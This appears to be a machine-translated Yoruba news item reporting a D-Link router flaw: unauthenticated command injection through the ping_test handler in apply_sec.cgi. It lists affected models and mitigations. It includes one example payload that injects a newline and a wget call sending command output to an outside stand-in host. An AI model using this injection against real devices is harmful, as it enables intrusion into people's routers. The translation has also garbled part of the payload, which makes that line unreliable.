Ni D-Link alailowaya onimọ ipalara ti o lewu (), eyiti o fun ọ laaye lati ṣiṣẹ koodu latọna jijin ni ẹgbẹ ẹrọ nipa fifiranṣẹ ibeere pataki kan si olutọju “ping_test”, wiwọle laisi ijẹrisi.
O yanilenu, ni ibamu si awọn olupilẹṣẹ famuwia, ipe “ping_test” yẹ ki o ṣiṣẹ nikan lẹhin ijẹrisi, ṣugbọn ni otitọ o pe ni eyikeyi ọran, laibikita wíwọlé sinu wiwo wẹẹbu. Ni pataki, nigbati o ba n wọle si iwe afọwọkọ apply_sec.cgi ati gbigbe “igbese = ping_test” paramita, iwe afọwọkọ naa ṣe itọsọna si oju-iwe ijẹrisi, ṣugbọn ni akoko kanna ṣe iṣe ti o nii ṣe pẹlu ping_test. Lati ṣiṣẹ koodu naa, ailagbara miiran ni a lo ni ping_test funrararẹ, eyiti o pe ohun elo ping laisi ṣayẹwo deede ti adiresi IP ti a firanṣẹ fun idanwo. Fun apẹẹrẹ, lati pe ohun elo wget ati gbe awọn abajade ti aṣẹ “iwoyi 1234” si agbalejo ita, kan pato paramita “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( iwoyi 1234)".
Iwaju ailagbara naa ti jẹrisi ni ifowosi ni awọn awoṣe atẹle:
- DIR-655 pẹlu famuwia 3.02b05 tabi agbalagba;
- DIR-866L pẹlu famuwia 1.03b04 tabi agbalagba;
- DIR-1565 pẹlu famuwia 1.01 tabi agbalagba;
- DIR-652 (ko si alaye nipa awọn ẹya famuwia iṣoro ti a pese)
Akoko atilẹyin fun awọn awoṣe wọnyi ti pari tẹlẹ, nitorinaa D-Link , eyi ti kii yoo tu awọn imudojuiwọn silẹ fun wọn lati yọkuro ailagbara, ko ṣeduro lilo wọn ati imọran rirọpo wọn pẹlu awọn ẹrọ titun. Gẹgẹbi iṣẹ aabo aabo, o le ṣe idinwo iwọle si wiwo wẹẹbu si awọn adirẹsi IP ti o gbẹkẹle nikan.
O ti ṣe awari nigbamii pe ailagbara naa tun wa awọn awoṣe DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ati DIR-825, awọn eto fun idasilẹ awọn imudojuiwọn fun eyiti a ko ti mọ.
orisun: opennet.ru